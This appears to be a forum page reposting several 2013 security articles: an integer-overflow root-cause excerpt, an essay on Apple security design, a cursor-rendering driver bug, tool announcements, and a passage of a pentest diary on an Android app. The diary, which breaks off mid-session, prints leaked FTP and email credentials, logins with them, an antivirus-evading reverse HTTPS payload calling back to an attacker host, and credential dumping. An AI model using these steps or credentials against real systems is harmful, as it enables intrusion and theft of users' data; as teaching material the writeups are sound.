Attempting to allocate a buffer with size: 0x4 * 0x200000009C Failed to allocate buffer. Interesting. Calloc will fail to allocate a buffer due to checks intended in detect wrapped values. Under Windows XP SP3, this functionality can be seen in the following 2 instructions. eax=ffffffe0 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee eip=77c2c0dd esp=0022ff1c ebp=0022ff48 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 msvcrt!calloc+0x1a: 77c2c0dd f7f1 div eax,ecx eax=3ffffff8 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee eip=77c2c0df esp=0022ff1c ebp=0022ff48 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 msvcrt!calloc+0x1c: 77c2c0df 3b450c cmp eax,dword ptr [ebp+0Ch] ss:0023:0022ff54=80000027 Here we can see that the (near) maximum value for a 32 bit register (0xFFFFFFE0) is divided by our first argument supplied to Calloc. The result is then compared against the second value supplied to calloc. If the second value is larger, Calloc is able to determine that an integer overflow will occur and exit. However, the _Calloc function found in the GSFU module, unlike msvcrt!calloc, does not contain this check. Take a look at the following example: #include <stdio.h> #include <malloc.h> int _calloc( size_t num, size_t size ) { size_t total = num * size; // Integer overflow occurs here return (total); } int main( void ) { int size = 4; // Size of Element int num = 0x80000017; // Number of Elements int *buffer; int chunk_size = _calloc( size, num ); printf ("Attempting to allocate a buffer with size: 0x%X\n", chunk_size); buffer = (int *)malloc(chunk_size); if( buffer != NULL ) printf( "Allocated buffer with size (0x%X)\n", _msize(buffer) ); else printf( "Failed to allocate buffer.\n" ); free( buffer ); } Here we can see that instead of using the actual calloc function, we’re multiplying our two values (“Element Size” and “Number of Elements”) and storing the result in a variable called “chunk_size”. That value is then supplied as the size argument to malloc. Using the values from our mutated seed, let’s take a look at our sample program’s output: Attempting to allocate a buffer with size: 0x9C Allocated buffer with size (0x9C) As we expected, the application readily accepts our wrapped value (0x9C) and provides this as the size argument being supplied to malloc. This in turn will cause our buffer to be undersized allowing our heap overflow to occur. ARTICOL COMPLET: https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/
-
Apple's security strategy: make it invisible Rich Mogull @rmogull When I received an invitation to the keynote event at Apple’s Worldwide Developers Conference, my first reaction was, “Why?” I’m known as a security guy, which means my keynote invites are only when major security features are released. But as I watched the presentations, I began to understand why. Among the many new features in iOS and OS X that the company discussed, two security-related ones received extended attention: iCloud Keychain and Activation Lock. And as I thought about the demos of those and other new features in the days that followed, I came to realize something about the company’s approach to security that I hadn’t thought about before. The human factor Apple is famously focused on design and human experience as their top guiding principles. When it comes to security, that focus created a conundrum. Security is all about placing obstacles in the way of attackers, but (despite the claims of security vendors) those same obstacles can get in the way of users, too. For many years, Apple tended to choose good user experience at the expense of leaving users vulnerable to security risks. Take passwords, for example: As essential as they are to protecting us and our devices, they are one of the most universally despised things about using technology. (I’ve ranted about passwords elsewhere). For many years, Apple tended to choose good user experience at the expense of leaving users vulnerable to security risks. That strategy worked for a long time, in part because Apple’s comparatively low market share made its products less attractive targets. But as Apple products began to gain in popularity, many of us in the security business wondered how Apple would adjust its security strategies to its new position in the spotlight. As it turns out, the company not only handled that change smoothly, it has embraced it. Despite a rocky start, Apple now applies its impressive design sensibilities to security, playing the game its own way and in the process changing our expectations for security and technology. Pragmatic design While Apple hasn’t said so explicitly, it’s clear that one key principle guides them when it comes to security: The more you impede a user’s ability to do something, the more likely that user is to circumvent security measures. There were three good examples in the company’s WWDC keynote: iCloud Keychain iCloud Keychain: When Apple first announced iCloud Keychain, I was initially perplexed. Why add a password manager to the operating system and default browser when there are plenty of third-party applications that do this, and it isn’t among a feature users are screaming for? Then I realized that Apple was tackling a real-world security issue by trying to make that issue simply go away for the average user. Apple certainly can’t stop the onslaught of phishing attacks. But it can add a built-in, cloud-based password manager that both reduces security risks and improves the user experience. That addition enables users to use complex, site-specific passwords, and those passwords will—with no user effort—synchronize across all of their devices and be available whenever they’re needed (assuming those users use Apple products only, of course). With the deep browser integration demonstrated at WWDC, it appears users won’t have to manage plugins or even click extra buttons to decide when they need to use the tool; it seems to pop up exactly when they need it, making it easier to use a Keychain-created password than manually enter one. That’s applying human design principles to solve a security problem and improve the overall user experience. No extra software to install, No plugins to manage. No buttons to remember to click. iCloud Keychain might not be good enough for power users, but it will bring the power of password management to the masses. Activation Lock Activation Lock: The theft of iDevices is rampant throughout the world. While we might blame Apple for producing such desirable products, the company clearly doesn’t want people to have to hide their devices in fake Blackberry cases to use them in public without fear. Phone carriers could dramatically reduce theft by refusing to activate stolen phones (every cellular enabled device has a unique hardware ID), but so far they have been slow to act. Even if domestic carriers did create a registry, it’s unlikely all foreign carriers would and bad guys would simply ship phones overseas. Activation Lock takes that decision out of carriers’ hands and instead applies a global solution. Barring new hacking techniques, phones tied to iCloud accounts will be unusable once stolen. Users don’t really need to do anything other than possess a free iCloud account. There’s no carrier lock-in, registration, paperwork, or other obstacles to using it. The feature has the potential to reduce device theft at no additional cost to consumers. So, once again, Apple is tackling a real-world problem without sacrificing the user experience. (Only time will tell how effective it is). Gatekeeper and the Mac App Store—As I’ve written previously, Gatekeeper combines sandboxing, the Mac App Store, and code-signing to dramatically reduce the chance a user can be tricked into installing malware. This is based on the success of the extreme sandboxing and reliance on the App Store for iOS that has prevented widespread malware from ever appearing on the iOS platform. Again, Apple addressed the user side of the problem. It didn’t rely on deep security technologies that targets could be tricked into circumventing. Rather, by pushing users to rely on applications from the Mac App Store and by providing strong incentives (like easier updates and no additional cost per computer), the company reduced the need to manually download apps from different locations. Apple then added Gatekeeper so users wouldn’t accidentally install applications from untrusted sources. This approach attacks the economics of malware while minimally impacting the user experience. A large percentage of users never need to think about where their software comes from or worry about being tricked into installing something bad. Invisible and practical You’ll see evidence of this same approach elsewhere in the Apple ecosystem. With FileVault 2, Apple provided full disk encryption for users to protect lost laptops. But at the same time, the technology allows users to safely and freely recover their system if they accidentally lock themselves out (without giving the NSA a back door). XProtect provides invisible, basic antimalware protection to all Macs, without the intrusiveness or cost normally associated with antivirus tools. Java in the browser is automatically disabled unless a user explicitly needs it; this introduces a small hurdle, while again minimizing the biggest attack path against current Macs. iOS will soon strongly encrypt all app data, while continuing the tight app isolation that effectively eliminates most forms of attack. These tight controls might frustrate some advanced technology users, and certainly frustrate security vendors. These tight controls might frustrate some advanced technology users, and certainly frustrate security vendors. But they also provide a safe user experience that’s proven itself effective over the past five years. The consistent thread through all these advances is Apple attempting, wherever possible, to use security to improve the user experience and make common security problems simply go away. By focusing so much on design, Apple increases the odds users will adopt these technologies and, so, stay safer. Sursa: Apple's security strategy: make it invisible | Macworld
-
[h=2]Changing the cursor shape in Windows proven difficult by NVIDIA (and AMD)[/h] If you work in the software engineering or information security field, you should be familiar with all sorts of software bugs – the functional and logical ones, those found during the development and internal testing along with those found and reported by a number of complaining users, those that manifest themselves in the form of occassional, minor glitches in your system’s logic and those that can lose your company 440 million US dollars in 30 minutes; not to mention bugs which can enable attackers to remotely execute arbitrary code on your computer without you even realizing it. While the latter type of issues is usually of most interest to security professionals and 0-day brokers (not all developers, though) and thus the primary subject of this blog, this post is about something else – the investigation of a non-security (and hardly functional) bug I originally suspected win32k.sys for, but eventually discovered it was a problem in the NVIDIA graphics card device drivers. Figure 1. My typical work window order, with vim present in the background. To give you some background, I am a passionate user of vim for Windows (gvim, specifically). When working with code, my usual set up for one of the monitors is a black-themed vim window set for full-screen, sometimes with other smaller windows on top when coding happens to be preempted with some other tasks. The configuration is illustrated in Figure 1 in a slightly smaller scale. A few weeks ago, I noticed that moving the mouse cursor from the vim window over the border of the foreground window (Process Explorer in the example) and inside it, the cursor would be occassionally rendered with colorful artifacts while changing the shape. Interestingly, these artifacts would only show up for a fraction of second and only during one in a hundred (loose estimate) hovers from vim to another window. Due to the fact that the condition was so rare, difficult to reproduce manually and hardly noticeable even when it occured, I simply ignored it at the time, swamped with work more important than some random pixels rendered for a few milliseconds once or twice a day. Once I eventually found some spare time last week, I decided to thoroughly investigate the issue and find out the root cause of this weird behavior. I was primarily motivated by the fact that colorful artifacts appearing on the display could indicate unintended memory being rendered by the system, with the potential of pixels representing uninitialized kernel memory (thus making it a peculiar type of information disclosure vulnerability). Both me and Gynvael have found similar issues in the handling of image file formats by popular web browsers in the past, so the perspective of disclosing random kernel bytes seemed tempting and not too far off. Furthermore, I knew it was a software problem rather than something specific to one hardware configuration, as I accidentally encountered the bug on three different Windows 7 and 8 machines I use for my daily work. Following a brief analysis, it turned out I was not able to reproduce the issue using any background window other than vim. While I started considering if this could be a bug in vim itself, I tested several more windows (moving the mouse manually for a minute or two) and finally found that the Notepad worked equally well in the role of a background. Not a vim bug, hurray! As both windows share the same cursor shape while in edit mode – the I-beam, I concluded the bug must have been specific to switching from this specific shape to some other one. Precisely, while hovering the mouse over two windows and a boundary, the cursor switches from I-beam () to a horizontal resize () and later to a normal arrow (). Relying on the assumption that the bug is a race condition (or least timing related, as the problem only manifested while performing rapid mouse movements), I wrote the following proof of concept code to reproduce the problem in a more reliable manner (full source code here): LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { CONST UINT kTimerId = 1337; CONST UINT kIterations = 100; static HCURSOR cursor[3]; switch(msg) { case WM_CREATE: // Load cursors. cursor[0] = LoadCursor(NULL, IDC_IBEAM); cursor[1] = LoadCursor(NULL, IDC_SIZEWE); cursor[2] = LoadCursor(NULL, IDC_ARROW); // Set up initial timer. SetTimer(hwnd, kTimerId, 1, NULL); break; case WM_TIMER: // Rapidly change cursors. for (UINT i = 0; i < kIterations; i++) { SetCursor(cursor[0]); SetCursor(cursor[1]); SetCursor(cursor[2]); } // Re-set timer. SetTimer(hwnd, kTimerId, 1, NULL); break; [...] Articol complet: http://j00ru.vexillium.org/?p=1980
-
MAC Address Scanner [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]MAC Address Scanner is the free desktop tool to remotely scan and find MAC Address of all systems on your local network.[/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] It allows you to scan either a single host or range of hosts at a time. During the scan, it displays the current status for each host. After the completion, you can generate detailed scan report in HTML/XML/TEXT format. Note that you can find MAC address for all systems within your subnet only. For all others, you will see the MAC address of the Gateway or Router. Being GUI based tool makes it very easy to use for all level of users including beginners. It is fully portable and works on all platforms starting from Windows XP to Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Features [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Quickly find MAC address of all systems on the Network Scan single or multiple systems Ability to stop the scanning operation at any time Color based representation for successful and failed hosts Save the scan report to HTML/XML/TEXT file Free and easy to use tool with cool GUI interface Fully Portable and can be run on any Windows system Support for local Installation & Un-installation [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Screenshot 1: MAC Address Scanner scanning the hosts and showing the discovered MAC addresses in blue color. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Screenshot 2: HTML based MAC Address scan report generated by MACAddressScanner[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Release History[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 1.0 : 7th July 2013[/TD] [/TR] [TR] [TD]First public release of MAC Address Scanner[/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Download [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download MAC Address Scanner v1.0 License : Freeware Platform : Windows XP, 2003, Vista, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] Sursa: MAC Address Scanner : Desktop Tool to Find MAC address of Remote Computers on Local Network | www.SecurityXploded.com
-
Arachni v0.4.3 has been released (Open Source Web Application Security Scanner Framework) From: Tasos Laskos <tasos.laskos () gmail com> Date: Sat, 06 Jul 2013 21:59:02 +0300 Hey folks, There's a new version of Arachni, an Open Source, modular and high-performance Web Application Security Scanner Framework written in Ruby. The change-log is quite sizeable but some bullet points follow. For the Framework (v0.4.3): * Stable multi-Instance scans, taking advantage of SMP/Grid architectures for higher efficiency and performance. * Automated Grid load-balancing. * Platform fingerprinting for tailor-made audits resulting in less bandwidth consumption, less server stress and smaller scan runtimes. For the Web User Interface (v0.4.1): * Support for PostgreSQL. * Support for importing data and configuration from the previous 0.4.2-0.4 packages. Packages: * Downgraded to require GLIBC >= 2.12 for improved portability. For more details about the new release please visit: Version 0.4.3 is out - Arachni - Web Application Security Scanner Framework Download page: Download - Arachni - Web Application Security Scanner Framework Homepage - Home - Arachni - Web Application Security Scanner Framework Blog - Arachni - Web Application Security Scanner Framework - Web Application Security Scanner Framework Documentation - https://github.com/Arachni/arachni/wiki Support - Welcome - Arachni Support GitHub page - http://github.com/Arachni/arachni Code Documentation - Documentation for Arachni/arachni (master) Author - Tasos "Zapotek" Laskos (http://twitter.com/Zap0tek) Twitter - http://twitter.com/ArachniScanner Copyright - 2010-2013 Tasos Laskos License - Apache License v2 Cheers, Tasos Laskos. This list is sponsored by Cenzic -------------------------------------- Let Us Hack You. Before Hackers Do! It's Finally Here - The Cenzic Website HealthCheck. FREE. Request Yours Now! Application Security Testing Vulnerabilities | Cenzic Hailstorm Products -------------------------------------- Sursa: WebApp Sec: Arachni v0.4.3 has been released (Open Source Web Application Security Scanner Framework)
-
[h=1]Mobile Application Hacking Diary Ep.1[/h] Mobile Application Hacking Diary Ep.1 |=--------------------------------------------------------------------=| |=------------=[ Mobile Application Hacking Diary Ep.1]=--------------=| |=--------------------------=[ 3 July 2013 ]=-------------------------=| |=----------------------=[ By CWH Underground ]=--------------------=| |=--------------------------------------------------------------------=| ###### Info ###### Title : Mobile Application Hacking Diary Ep.1 Author : ZeQ3uL and diF Team : CWH Underground Date : 2013-07-03 ########## Contents ########## [0x00] - Introduction [0x01] - Application Reconnaissance [0x01a] - Insecure Data Storage [0x01b] - Decompile Application Package [0x02] - Man in the Middle Attack [0x02a] - Preparation Tools [0x02b] - MitM Attack [0x03] - Server-Side Attack [0x03a] - Scanning [0x03b] - Gaining Access [0x03c] - Bypass Anti-Virus [0x03d] - PWNed System !! [0x03e] - It's Not Over !! [0x04] - Greetz To ####################### [0x00] - Introduction ####################### 000000000000000000000000000000000000000000000000 00000000000000 00000000000000000 000000000000000 During the past few years, we've seen mobile devices evolve from simple, 000000000000000 00000000000000 000000000000000 rather dumb phones to complete, integrated communication devices. 000000000000000 00000000000 0000000000000000 As these devices became more intelligent ("smart" phones) and data 0000000000000000 00000000000000000 transfer speeds on mobile networks increased significantly, people no longer 00000000000000 000000000000000 used them solely for making phone calls or sending text messages, but started 000000000000 000 000 0000000000000 using them for sending email, browsing the Internet, playing games, checking-in 00000000000 000 000 000000000000 for flights, or doing online banking transactions. 0000000000 00000000000 0000000000 00000000000 Companies started creating mobile applications to offer all sorts of services to their 000000000000000000000000000000000000000000000000 clients. Today, mobile applications are available for storing and synchronizing data 0000 00 00 0000 files in the cloud, participating in social network sites, or even playing with a talking 000 00 00 000 crazy frog. 000 00 00 000 000 00 00 000 As the data that is stored, processed, and transferred by these applications can often 000 00 00 000 be considered sensitive, it is important to ensure that the security controls on these mobile 0000 000 000 0000 devices and applications is effective. 0000000000 0000000000 000000000000000 000000 0000 00000000000 000000000000000 000000 00000 0000000000 --SANS Penetration Testing Blog 000000000000000 000000 000000 000000000 000000000000000000000000000000000000000000000000 This papers is the narrative and the explanation of our penetration testing techniques from the real world as a case study of an Android application testing (Android is a Linux-based platform developed by Google and the Open Handset Alliance. Application programming for it is done exclusively in Java. The Android operating system software stack consists of Java applications running on a Dalvik virtual machine (DVK)). The main functions of this application work similarly to the famous Apple's iCloud; backup picture, video, contact and sync to a personal cloud system. Let's Begin! ##################################### [0x01] - Application Reconnaissance ##################################### "Usually, a client software package is installed locally on the mobile device which acts as the front-end for the user. Packages are typically downloaded from an app store or market, or provided via the company's website. Similar to non-mobile software, these applications can contain a myriad of vulnerabilities. It is important to note that most testing on the client device usually requires a device that is rooted or jailbroken. For example, the authentic mobile OS will most likely prevent you from having access to all files and folders on the local file system. Furthermore, as software packages can often be decompiled, tampered with or reverse engineered, you may want to use a device that does not pose any restrictions on the software that you can install." --SANS Penetration Testing Blog Our first mission is Application Reconnaissance. The objective of this mission is to understand how the application work, then try to enumerate sensitive information from data stored in a local storage and to dig out even more information, application package will be decompiled into a form of source code. +++++++++++++++++++++++++++++++++ [0x01a] - Insecure Data Storage +++++++++++++++++++++++++++++++++ We've started our first mission by creating an Android Pentest platform (Install Android SDK, Android Emulator and Burpsuite proxy) and get ready to connect to our phone using Android Debug Bridge (http://developer.android.com/tools/help/adb.html) , ADB is a versatile command line tool that lets you communicate with an emulator instance or connected Android-powered device. First, we signed up and logged in to the application then used ADB to connect a phone with a debug mode and used "adb devices" command. --------------------------------------------------------------- [zeq3ul@12:03:51]-[~]> adb devices * daemon not running. starting it now * * daemon started successfully * List of devices attached 3563772CF3BC00FH device --------------------------------------------------------------- "adb shell" command was the command we've used to connect to the phone in order to explore through the internal directory. Before we can do any further exploration, we need to identify real name of the application package which usually found in "/data/app/" folder in a form of ".apk". "/data/app/com.silentm.msec-v12.apk" was found to be a package of our target application so "com.silentm.msec-v12" is the real name of the package. Finally, folder belonging to the application in "/data/data" is most likely to be the place that sensitive information of the application are stored locally. As expected, we found crucial information stored in "/data/data/com.silentm.msec-v12/shared_prefs" as below. --------------------------------------------------------------- [zeq3ul@12:05:24]-[~]> adb shell # cd /data/data/com.silentm.msec-v12/shared_prefs # cat PREFS.xml <?xml versions='1.0' encoding='utf-8' standalone='yes'?> <map> <string name="Last_added">9</string> <boolean name"configured" value="true"/> <string name="package">Trial</string> <string name="version">1.2</string> <string name="username">zeq3ul</string> <string name="password">NXBsdXM0PTEw</string> <string name="number">089383933283</string> <string name="supportedextension">{"e;D"e;:"e;HTML,XLS,XLSX,XML,TXT,DOC,DOCX,PPT,PDF,ISO,ZIP,RAR,RTF"e;,"e;M"e;: "e;MP3,MP2,WMA,AMR,WAV,OGG,MMF,AC3"e;,"e;I"e;:"e;JPEG,JPG,GIF,BMP,PNG,TIFF"e;,"e;V"e;:"e;3GP,MP4,MPEG, WMA,MOV,FLV,MKV,MPEG4,AVI,DivX"e;}</string> ... </map> --------------------------------------------------------------- We've found our username and password stored locally in PREFS.xml, but password seems to be encrypted with some kind of encyption but if we take a good look into it you will found it was only base64 encoded string, so we can easily decoded it to reveal a real password. "NXBsdXM0PTEw" > "5plus4=10" TIPS! This is a bad example of how applications store sensitive data and also the encoding with Base64 (Encode != Encrypt) is such a bad idea of storing a password too. Example for bad code shown below: --------------------------------------------------------------- public void saveCredentials(String userName,String password) { SharedPreferences PREFS; PREFS=getSharedPreferences(MYPREFS,Activity.MODE_PRIVATE); SharedPreferences.Editor editor = PREFS.edit(); String mypassword = password; String base64password = new String(Base64.encodeToString(mypassword.getBytes(),4)); editor.putString("Username", userName); editor.putString("Password", base64password); editor.commit(); } --------------------------------------------------------------- +++++++++++++++++++++++++++++++++++++++++ [0x01b] - Decompile Application Package +++++++++++++++++++++++++++++++++++++++++ Next, in order to completely understand the mechanism of the application, we need to obtain the source code of the application. For Android application, this can be done by decompiling the Android Package (".apk") of the application. Android packages (".apk" files) are actually simply ZIP files. They contain the AndroidManifest.xml, classes.dex, resources.arsc, among other components. You can rename the extension and open it with a ZIP utility such as WinZip to view its contents. We've started with "adb pull" command to extract android application from mobile phone. --------------------------------------------------------------- [zeq3ul@12:08:37]-[~]> adb pull /data/app/com.silentm.msec-v12.apk 1872 KB/s (5489772 bytes in 2.862s) --------------------------------------------------------------- The next step is to decompile ".apk" we've just got using the tools called dex2jar (http://code.google.com/p/dex2jar/). dex2jar is intended to convert ".dex" files to human readable ".class" files in java. NOTICE! "class.dex" is stored in every ".apk" as mentioned above. This can be proved by changing any ".apk" to ".zip" and extracting it then you will find out about the structure of an ".apk" --------------------------------------------------------------- [zeq3ul@12:09:11]-[~]> bash dex2jar.sh com.silentm.msec-v12.apk dex2jar version: translator-0.0.9.8 dex2jar com.silentm.msec-v12.apk -> com.silentm.msec-v12_dex2jar.jar Done. --------------------------------------------------------------- JD-GUI (http://java.decompiler.free.fr/?q=jdgui) is our tool of choice to read a decompiled source (".jar" from dex2jar). In this case is "com.silentm.msec-v12_dex2jar.jar" NOTE: JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields. As a result, We found that "Config.class" stored smelly information (hard-coded) the source as shown below: Config.class --------------------------------------------------------------- package com.silentm.msec; public class Config { public static final String CONTACT_URL = "http://203.60.240.180/en/Contact.aspx"; public static final String Check_Memory = "http://203.60.240.180/en/CheckMem.aspx"; public static final String BackupSMS = "http://203.60.240.180/en/backupsms.aspx"; public static final String Forgot_Password = "http://203.60.240.180/en/ForgotPassword.aspx"; public static final String FTP_URL = "203.60.240.183"; public static final String FTP_User = "msec1s"; public static final String FTP_Password = "S1lentM!@#$ec"; public static final String Profile = "http://203.60.240.180/en/Profile.aspx"; public static final int MAX_MEMORY = 500; public static final int LOG_COUNT = 30; ... } --------------------------------------------------------------- Explain!! backup URL and FTP user and password was found in the source code (W00T W00T !!). Now we know that this application use FTP protocol to transfer picture, SMS, contact information to cloud server and it's SUCK!! because it's hard-coded and FTP is not a secure protocol. ################################### [0x02] - Man in the Middle Attack ################################### "The second attack surface is the communications channel between the client and the server. Although applications use more and more secured communications for sending sensitive data, this is not always the case. In your testing infrastructure, you will want to include an HTTP manipulation proxy to intercept and alter traffic. If the application does not use the HTTP protocol for its communication, you can use a transparent TCP and UDP proxy like the Mallory tool. By using a proxy, you can intercept, analyze, and modify data that is communicated between the client and the server." --SANS Penetration Testing Blog As we found that our target application use HTTP protocol, the next step is to setup a HTTP intercepting proxy tools such as ZapProxy or Burpsuite (Burpsuite was chosen this time) in order to perform our second misson, Man in the Middle attack, agaist the application. Having a web proxy intercepting requests is a key piece of the puzzle. From this point forward, our test will use similar technique to that of regular web applications testing. We've tried to intercepted every HTTP requests and response on application with Burpsuite Proxy (http://www.portswigger.net/burp/). For HTTP request, we found sensitive information (username and password) sent to server-side because it use HTTP protocol that sent packet in clear text while performing log in shown below (anyone in the middle of this communication will see those information crystal clear, what a kind App!). Burpsuite: HTTP Request --------------------------------------------------------------- POST http://203.60.240.180/en/GetInfo.aspx HTTP/1.1 Content-Length: 56 Content-Type: application/x-www-form-urlencoded Host: 203.60.240.180 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) imei=352489051163052&username=zeq3ul&password=5plus4=10 --------------------------------------------------------------- Moreover, on HTTP response, We found the information that surprise us; email and password for Gmail of someone (we found out latter that was an administrator email) was shown in front of our eyes!. Burpsuite: HTTP Response --------------------------------------------------------------- HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf=8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 07 June 2013 12:15:37 GMT Content-Length: 2405 {"AppVersion":"1.2","FTP_USER":"msec1s","FTP_PASS":"S1lentM!@#$ec","FTP_SERVER":"203.60.240.183","MAX_MEMORY":"500","LOG_COUNT":"30", "Smtp":"smtp.gmail.com","FromEmail":"mseccloud@gmail.com","FromEmailPwd":"M[Sec)0/",................ --------------------------------------------------------------- As a result, We were able to sniff username and password in clear text (no SSL nor encryption) and compromise the email of an administrator using email "mseccloud@gmail.com" and password "M[Sec)0/" that they gave us for free via HTTP reponse. :\ ############################# [0x03] - Server-Side Attack ############################# "In most cases, the server to which the client communicates is one or more web servers. The attack vectors for the web servers behind a mobile application is similar to those we use for regular web sites. Aside from looking for vulnerabilities in the web application, you should also perform host and service scans on the target system(s) to identify running services, followed by a vulnerability scan to identify potential vulnerabilities, provided that such testing is allowed within the scope of the assignment." --SANS Penetration Testing Blog ++++++++++++++++++++ [0x03a] - Scanning ++++++++++++++++++++ As we've found backend URL (203.60.240.180 and 203.60.240.183) from the source code, we need to check the security of the backend system as well. We've started by scanning target for open ports by using nmap (http://nmap.org). Nmap Result for 203.60.240.180 --------------------------------------------------------------- [zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICT Nmap scan report for 203.60.240.180 Host is up (0.0047s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.0 443/tcp open ssl/http Microsoft IIS httpd 7.0 3389/tcp open ms-wbt-server? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds --------------------------------------------------------------- Nmap Result for 203.60.240.183 --------------------------------------------------------------- [zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183 Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICT Nmap scan report for 203.60.240.183 Host is up (0.0036s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at http://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds --------------------------------------------------------------- From the scan result, we got a list of opening ports and we've found that there were IIS and Terminal Service running on 203.60.240.180 and FTP running on 203.60.240.183; It's time to grab low-hanging fruits. ++++++++++++++++++++++++++ [0x03b] - Gaining Access ++++++++++++++++++++++++++ As we found FTP username and password from the source code ("msec1s","S1lentM!@#$ec"). We were able to access to FTP service running on the server as shown below: FTP Server: 203.60.240.183 --------------------------------------------------------------- [zeq3ul@12:40:12]-[~]> ftp 203.60.240.183 Connected to 203.60.140.183 220 Microsoft FTP Service User <203.60.140.183:<none>>: msec1s 331 Password required Password: 230 User logged in. ftp> pwd 257 "/" is current directory. ftp> --------------------------------------------------------------- Now that we've compromised FTP Server using account "msec1s". We were able to access all customer contact, picture, video, Etc. Excitedly, we expected to find some "INTERESTING" picture or Clip video; BUT we found DICK! WTF!! so we got shock and stop searching. OTL _____________________________________________________________ | NO DICK NO DICK NO DICK NO DICK NO DICK ^^^^^^^^\ | | NO DICK NO DICK NO DICK NO DICK NO DICK | | | | NO DICK NO DICK NO DICK NO DICK NO DICK |_ __ | | | NO DICK NO DICK NO DICK NO DICK NO DICK (.(. ) | | | NO DICK NO DICK NO DICK NO DICK NO DI _ (_ ) | | \\ /___/' / | | _\\_ \ | | | (( ) /====| | | \ <.__._- \ | |___________________________________________ <//___. || Moving to our next target, 203.60.240.180, we've tried to access target via Terminal Service. Luckily, we were able to access target server using the same username and password from FTP Server ("msec1s","S1lentM!@#$ec"). Yummy! Remote Desktop with rdesktop --------------------------------------------------------------- [zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180 --------------------------------------------------------------- Moreover, "msecls" account was in an administrator privileges group. OWNAGED! +++++++++++++++++++++++++++++ [0x03c] - Bypass Anti-virus +++++++++++++++++++++++++++++ Many Anti-Virus programs work by pattern or signature matching. If any program look like malware by its appearance, the AV will catch it. If the malicious file has a signature that the AV do not know, AV are most likely to identify those file as clean and unharmed. "Veil, a new payload generator created by security expert and Blackhat USA class instructor Chris Truncer, does just that." -- https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/ Simply pick payload and use msfveom shellcode, chose reverse HTTPS to our web server (cwh.dyndns.org) by following command: --------------------------------------------------------------- ======================================================================== Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013 ======================================================================== [?] Use msfvenom or supply custom shellcode? 1 - msfvenom (default) 2 - Custom [>] Please enter the number of your choice: 1 [?] What type of payload would you like? 1 - Reverse TCP 2 - Reverse HTTP 3 - Reverse HTTPS 0 - Main Menu >] Please enter the number of your choice: 3 [?] What's the Local Host IP Address: cwh.dyndns.org [?] What's the Local Port Number: 443 --------------------------------------------------------------- Now we've got payload.exe file, When any Windows system execute this .exe, they will try to connect to the our server immediately. +++++++++++++++++++++++++++ [0x03d] - PWNED System !! +++++++++++++++++++++++++++ Time to PWN! As the target server (203.60.140.180) can be access using MSRDP Service (on port 3389) + it has access to the internet, we can just open the web server on our machine and then remote (via MSRDP) to the server to download and get our payload (payload.exe) executed. Executed Metasploit payload (payload.exe) will connect a meterpreter payload back (reverse_https) to our server (cwh.dyndns.org). After that, we used hashdump to get LM/NTLM hash on server but this cannot be done yet because if you are on a x64 box and meterpreter isn't running in a x64 process, it will fail saying that it doesn't have the correct version offsets (x64 system and Meterpreter is x86/win32). So we need to find a good process to migrate into and kick it from there. In this case we migrate our process to Winlogon process which running as x64 box. Our console will have a log like this. --------------------------------------------------------------- [zeq3ul@13:16:14]-[~]> sudo msfconsole [sudo] password for zeq3ul: Call trans opt: received. 